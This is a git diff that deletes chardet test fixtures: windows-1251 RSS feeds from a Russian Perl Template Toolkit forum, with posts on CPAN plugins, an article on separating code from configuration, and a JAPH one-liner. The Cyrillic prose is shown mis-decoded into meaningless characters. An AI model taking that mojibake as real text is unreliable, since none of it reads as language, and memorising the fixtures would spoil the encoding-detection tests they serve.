http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - טםעונפויס ך pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">גונסט 0.02 למהףכ Template::Plugin::DBM::Deep</a>. ּמהףכ ןנוהמסעאגכוע טםעונפויס ך למהףכ‏ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - ןמהדמעמגךא למהףכ ך הטסענטבףצטט טח TT-ראבכמםמג - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">גונסט 0.74 למהףכ ExtUtils::ModuleMaker::TT</a>. ּמהףכ ןמחגמכוע סענמטע סעאםהאנעםו פאיכ, גץמהשטו ג סמסעאג הטסענטבףעטגא למהףכ (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), טח ראבכמםמג TT. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - סנאגםוםטו סענמך - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">גונסט 0.01 ןכאדטםא Template::Plugin::String::Compare</a>, ךמעמני ןמחגמכוע סנאגםטגאע סענמךט ג סענמךמגמל ךמםעוךסעו.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -ׂאךמו סנאגםוםטו ןנמגמהטעס ג קטסכמגמל ךמםעוךסעו. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -עמ סנאגםוםטו ןנמטסץמהטע ג סענמךמגמל ךמםעוךסעו. -[% END %] -</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - ׁנוהא הכ נאחנאבמעךט eCommerece ןנטכמזוםטי Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - ֽא CPAN מןףבכטךמגאם <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">למהףכ Handel (גונסט 0.04)</a>. עמע למהףכ ןנוהמסעאגכוע סנוהף הכ נאחנאבמעךט eCommerece ןנטכמזוםטי ס ןמההונזךמי AxKit ט Template Toolkit. - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - טסןמכחמגאםטו SSI ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - ֽא CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">גונסט 0.11 Template::Plugin::SSI</a>. ּמהףכ גכועס מבונעךמי גמךנףד CGI::SSI ט ןמחגמכוע טסןמכחמגאע ג ראבכמםאץ SSI-הטנוךעטג.<br /><br /><div class="code"><pre>[% USE SSI %] - -# גךכ‏קוםטו (virtual) פאיכא /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# גךכ‏קוםטו פאיכא /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# גןמכםטע ךמלאםהף -[% SSI.exec('cmd', 'ls') %] - -# גןמכםטע cgi סךנטןע -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# ףסעאםמגטע ןונולוםםף‏ ךמםפטדףנאצטט ('sizefmt', 'timefmt', טכט 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# גגוסעט םאבמנ ןונולוםםף‏ מךנףזוםט -[% SSI.echo('DATE_LOCAL') %] - -# ףסעאםמגטע כמךאכםף‏ ןונולוםםף‏ ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# גגוסעט האעף ןמסכוהםוי למהטפטךאצטט 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# גגוסעט נאחלונ פאיכא 'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.8.xml b/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.8.xml deleted file mode 100644 index 5c352ab..0000000 --- a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - װמנףל Template Toolkit : ֱטבכטמעוךט הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. ֽא סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. Text::Template, HTML::Template, Mason ט הנףדטו בטבכטמעוךט - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT - ׀אחהוכוםטו ךמהא, ןנוהסעאגכוםט, ט ךמםפטדףנאצטט - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - ֽא <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> מןףבכטךמגאםא סעאע ֱנאיאםא הו װמ (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. ֽטזו ןנטגמהטעס ןונוגמה סעאעט.<br /><br /><span style="font-weight:bold">נאעךטי מבחמנ.</span><br /><br /> גחכ ןנמדנאללף טח ןנוההףשוי סעאעט ט נאחהוכטכ ךמה, ןנוהסעאגכוםטו ט ךמםפטדףנאצט‏, קעמב סהוכאע ןנמדנאללף במכוו דטבךמי ט כודךמי הכ ןמההונזךט.<br /><br /><span style="font-weight:bold">1. ֲגוהוםטו.</span><br /><br />ֲ ןמסכוהםול גןףסךו ןנוהסעאגטכ ןנמדנאללף, ךמעמנף‏ טסןמכחף‏ הכ עמדמ, קעמב חאבטנאע ט מעמבנאזאע Rich Site Summaries (RSS) ס הנףדטץ גוב-סאיעמג<span style="font-weight:bold"><sup>1</sup></span>. ֲ ךמהו טסןמכחמגאכ כטעונאכםו גוכטקטם, קעמב ףךאחאע ךאךטו פאיכ חאדנףזאע ט ךאך ןנוהסעאגכע האםםו, ט מבושאכ קעמ ג ‎עמל גןףסךו ‎עמ טסןנאגכ‏.<br /><br /><span style="font-style:italic">ֻטסעטםד 1</span> סמהונזטע ןנמדנאללף, ךמעמנף‏ ןנוהסעאגככ ג ןנוההףשול גןףסךו. ֲ לאססטגו <span style="font-weight:bold">@files</span> ץנאםעס פאיכ, ךמעמנו םומבץמהטלמ חאדנףחטע, <span style="font-weight:bold">$base</span> - ךאעאכמד, דהו סמץנאםועס גגמה, ט םוסךמכךמ גנאזוםטי <span style="font-weight:bold">print</span> סמחהא‏ע HTML ס ןמהסעאםמגךמי ןנמסעץ ןונולוםםץ (קעמ ןנוהןמקעטעוכםוו סךאזול קול טסןמכחמגאע HTML-פףםךצטט למהףכ CGI). עמ םודטבךטי ט ענףהםי הכ סמןנמגמזהוםט ךמה. מדהא חאץמקף ןמלוםע סןטסמך סאיעמג טכט גגמה, נטסךף‏ סכמלאע ןנמדנאללף, וסכט םאבונף קעמ-עמ םוןנאגטכםמ טכט סהוכא‏ הנףדף‏ מרטבךף.<br /><br /><span style="font-style:italic">ֻטסעטםד 1: ַאדנףחקטך RSS ס זוסעךמןנמןטסאםםלט חםאקוםטלט.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. ־עהוכוםטו ןנוהסעאגכוםט.</span><br /><br />ױמנמרטי הטחאים םו סגחגאוע סוב ס קאסעםל ןנוהסעאגכוםטול האםםץ. ּמ ןנמדנאללא המכזםא חאבנאע האםםו ט סהוכאע טץ המסעףןםלט קולף-עמ, קעמ טץ ןנוהסעאגכוע - עמ, קעמ נאבמעא‏ ס RSS םו המכזםמ טלוע חםאקוםט. למדף חאץמעוע ןנמטחגמהטע HTML, TeX, ןנמסעמי עוךסע, טכט האזו ךאךמי-עמ פמנלאע, ךמעמני םו למדף סובו ןנוהסעאגטע.<br /><br />ֲמחלמזםמ ךעמ-עמ חאץמקוע םאןטסאע סמבסעגוםםף‏ סטסעולף הכ נאבמע ס ראבכמםאלט, םמ לםו םנאגטעס למהףכ Text::Template ּאנךא-ִזויסמםא ִמלטםףסא (Mark-Jason Dominus). ־ם הוכאוע גסו קעמ לםו םומבץמהטלמ, םו ענובףוע הכ סגמוי נאבמע המןמכםטעוכםץ ןנמדנאלל ט םאןטסאם ןמכםמסע‏ םא Perl. ׃ םודמ ןנמסעמי טםעונפויס ט לםו םו ענובףועס טחףקאע חך ראבכמםמג, ןמסךמכךף ראבכמם טסןמכחף‏ע Perl.<br /><br /><span style="font-style:italic">ֻטסעטםד 2</span> - ‎עמ עא זו ןנמדנאללא, עמכךמ גלוסעמ גםוהנוםםמדמ HTML טסןמכחףועס Text::Template. ֲ סענמךו 5 טלןמנעטנף‏ לועמה fill_in_file(). ֲ סענמךו 13 ףךאחגא‏ ראבכמם, ךמעמני בףהף טסןמכחמגאע. ֲוס HTML, טסןמכחףולי ןנמדנאללמי, עוןונ גםוסום ג פאיכ ראבכמםא, ןנטגוהוםםי ג <span style="font-style:italic">כטסעטםדו 3</span>.<br /><br />ּמהףכ Text::Template למזוע ןנטםטלאע האםםו ךאך ץור. כ‏קט ץורא סעאםמגעס טלוםאלט ןונולוםםץ ג ראבכמםו, א חםאקוםט - חםאקוםטלט ןונולוםםץ ראבכמםא, א עאךזו מןנוהוכ‏ע עטן ןונולוםםץ. ֵסכט חםאקוםטו ץורא ןנמסעמי סךאכנ, ןונולוםםא ראבכמםא סךאכנ. ֵסכט חםאקוםטו ץורא - אםמםטלםי לאססטג, ןונולוםםא ראבכמםא - לאססטג, ט עאך האכוו.<br /><br />־בתוךע, סמחהאגאולי XML::RSS - אםמםטלםי ץור. ּמהףכ ןנוהמסעאגכוע אבסענאךעםי טםעונפויס הכ סמחהאםט, םמ םו הכ המסעףןא. עמ מעקאסעט טלוםםמ עמ, קעמ המכזום ןונוהאע למולף ראבכמםף. ֲ ראבכמםו <span style="font-weight:bold">$rss-&gt;channel</span>, ךמעמנא ג ךאקוסעגו חםאקוםט סמהונזטע אםמםטלםי ץור, סעאםמגטעס <span style="font-weight:bold">%channel</span>, א <span style="font-weight:bold">$rss-&gt;items</span>, סמהונזאשא אםמםטלםי לאססטג סעאםמגטעס <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">ֻטסעטםד 2: ָסןמכחמגאםטו ראבכמםא.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />ֲםףענט ראבכמםא Text::Template טסןמכםוע בכמךט ךמהא, ךמעמנו מם םאץמהטע לוזהף פטדףנםלט סךמבךאלט. ־ם חאלוםוע בכמך ןמסכוהםטל גקטסכוםםל גנאזוםטול. ָלוםא ןונולוםםץ - ךכ‏קט ץורא, ססכךף םא ךמעמני ןונוהאכ ג ךאקוסעגו אנדףלוםעא פףםךצטט fill_in_file() ג ךמהו, ןנטגוהוםםמל ג <span style="font-style:italic">כטסעטםדו 2</span>.<br /><br /><span style="font-style:italic">ֻטסעטםד 3: HTML ראבכמם.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br />אך עמכךמ סטסעולא ראבכמםמג חאהויסעמגאםא, למדף לוםע ןנוהסעאגכוםטו םו לום כמדטךף ךמהא. ֵסכט ןנטלף נורוםטו טחלוםטע גטה ןנוהסעאגכוםט האםםץ, ןמלום‏ עמכךמ ראבכמם. ֵסכט לםו גלוסעמ HTML ענובףועס ןנמסעמי עוךסע, עמכךמ טחלום‏ ןמה םמגי פמנלאע ראבכמם, ךאך ‎עמ סהוכאםמ ג <span style="font-style:italic">כטסעטםדו 4</span>.<br /><br /><span style="font-style:italic">ֻטסעטםד 4: ״אבכמם הכ מבקםמדמ עוךסעא.</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. ־עהוכוםטו ךמםפטדףנאצטט.</span><br /><br />ױמנמרטי הטחאים עאךזו ןמחגמכוע אהאןעטנמגאע סךנטןע ך נאחכטקםמלף מךנףזוםט‏. ֲ <span style="font-style:italic">כטסעטםדו 1</span> זוסעךמ ןנמןטסאכ חםאקוםטו הטנוךעמנטט הכ גגמהא, קעמ הוכאוע למי סךנטןע ץנףןךטל - וסכט למ המלארם הטנוךעמנט ןמלוםועס, סךנטןע סכמלאועס. נמלו עמדמ <span style="font-style:italic">ג כטסעטםדו 2</span> זוסעךמ ןנמןטסאםמ טל ראבכמםא, םוסלמענ םא עמ קעמ למדף לוםע ןנוהסעאגכוםטו, טחלום ראבכמם. ּםו םףזםמ טלוע גמחלמזםמסע האגאע ךאזהמלף ראבכמםף סמהונזאעוכםמו טל גלוסעמ טסןמכחמגאםט מהםמדמ ט עמדמ זו טלוםט הכ נאחםמדמ סמהונזטלמדמ.<br /><br />ּםמדטו סגמבמהםמ-המסעףןםו סךנטןע, ךמעמנו םארוכ ג ָםעונםוע ענובף‏ע, קעמב ןמכחמגאעוכ מענוהאךעטנמגאכ גונץם‏‏ קאסע סךנטןעא טכט גךכ‏קאולף‏ בטבכטמעוךף, ךמעמנא סמהונזטע עמכךמ ךמםפטדףנאצטמםםו האםםו. ׂאךמי ןמהץמה ענובףוע, קעמב ךמםוקםי ןמכחמגאעוכ חםאכ מסםמג חךא ןנמדנאללטנמגאםט ט ןנאגטכ סךנטןע - מרטבךא סכמלאוע סךנטןע. ֿכמץטו ךמםפטדףנאצטמםםו האםםו למדףע ןנטגוסעט ך םומזטהאםםל נוחףכעאעאל, םמ מםט םו ןמכמלא‏ע ןנמדנאללף.<br /><br /> למדף ףךאחאע עוךףשטו ךמםפטדףנאצטמםםו האםםו םוסךמכךטלט סןמסמבאלט ט ןמךאזף עמכךמ מהטם טח םטץ. ְנץטג Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> סמהונזטע םוסךמכךמ למהףכוי הכ נאחבמנא ךמםפטדףנאצטמםםץ פאיכמג ג נאחכטקםץ פמנלאעאץ טכט אנדףלוםעמג ךמלאםהםמי סענמךט. ִטחאיםונ המכזם גבטנאע ןמהץמה, ךמעמני ףהמגכועגמנוע טץ םףזהאל.<br /><br />מדהא גןונגו םאקאכ מעהוכע האםםו ךמםפטדףנאצטט מע למטץ סךנטןעמג, ןונובנאכ םוסךמכךמ למהףכוי םא CPAN ט מסעאםמגטכס םא ConfigReader::Simple, ךמעמני טסןמכחףוע ןמסענמקםי פמנלאע ךכ‏ק-חםאקוםטו. טסןמכחמגאכ ודמ םאסעמכךמ קאסעמ, קעמ םאקאכ מעןנאגכע למט טחלוםוםט ֱוךף ־בונטםף (Bek Oberin), אגעמנף מנטדטםאכםמי גונסטט, חאעול ןמכםמסע‏ גחכ םא סוב ןמההונזךף למהףכ.<br /><br /><span style="font-style:italic">ֻטסעטםד 5</span> אהאןעטנףוע <span style="font-style:italic">כטסעטםד 2</span> ך טסןמכחמגאםט‏ ConfigReader::Simple. סמחהא‏ םמגי מבתוךע ךמםפטדףנאצטט, חאעול קטעא‏ חםאקוםט טח מבתוךעא. ּמהףכ ןנומבנאחףוע טלוםא ךכ‏קוי ךמםפטדףנאצטט ג טלוםא לועמהמג הכ ןנמסעמדמ המסעףןא (ץמע הכ המסעףןא ך חםאקוםטל ךכ‏קוי ס ‎ךחמעטקוסךטלט טלוםאלט, ךמעמנו םו למדףע בע ןנומבנאחמגאם ג טהוםעטפטךאעמנ Perl ןנטץמהטעס טסןמכחמגאע לועמה get()). <span style="font-style:italic">ֻטסעטםד 6</span> סמהונזטע ךמםפטדףנאצטמםםי פאיכ.<br /><br /><span style="font-style:italic">ֻטסעטםד 5: ָסןמכחמגאםטו ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">ֻטסעטםד 6: װאיכ ךמםפטדףנאצטט.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. ַאךכ‏קוםטו.</span><br /><br /> למדף ףלוםרטע נאחלונ למטץ ןנמדנאלל, מעהוכ ךמה מע כמדטךט ןנוהסעאגכוםט ט ךמםפטדףנאצטמםםמי טםפמנלאצטט. עמ נאחהוכוםטו הוכאוע ןנמדנאללף במכוו דטבךמי ט ןנמסעמי ג אהאןעאצטט ך םמגל מךנףזוםטל. ״אבכמם ןמחגמכ‏ע טחלוםע גגמה, א ךמםפטדףנאצטמםםו פאיכ ףןנאגכע נאבמעמי ןנמדנאלל בוח טחלוםוםט ךמהא. Text::Template ט ConfigReader::Simple הוכא‏ע ‎עמ םאסעמכךמ ןנמסעל, םאסךמכךמ גמחלמזםמ.<br /><br /><span style="font-weight:bold">5. ׁסכךט</span><br /><br />ֲסו למהףכט, ףןמלטםאולו ג ‎עמי סעאעו, למזםמ םאיעט םא Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ־ב אגעמנו.</span><br /><br />ֱנאיאם הו װמי (brian d foy) - טחהאעוכ <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">ֿנטלוקאםט.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">מנטדטםאכ סעאעט םא Perl Review (PDF)</a> - - ֻמבאםמג ָדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - ִנףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.9.xml b/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.9.xml deleted file mode 100644 index 48368fa..0000000 --- a/chardet/tests/windows-1251-cyrillic/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - װמנףל Template Toolkit : חך ןנמדנאללטנמגאםט Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. ֽא סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. ׂול, סגחאםםו ס ןנמדנאללטנמגאםטול ג Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - ֱוסןכאעםי Perl-נוהאךעמנ - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - ֱוסןכאעםי Perl-נוהאךעמנ הכ Windows ס לםמזוסעגוםםלט טםסענףלוםעאלט מעכאהךט סךנטןעמג.<br /> -<br /> -URL חאדנףחךט: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -ִמלארם סענאםטצא: <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - ִנףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - ִנףדטו עול, סגחאםםו ס ראבכמםאלט ט Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/windows-1251-cyrillic/greek.ru.xml b/chardet/tests/windows-1251-cyrillic/greek.ru.xml deleted file mode 100644 index b0b8338..0000000 --- a/chardet/tests/windows-1251-cyrillic/greek.ru.xml +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - Greek.Ru - ֿמקעט גסו מ 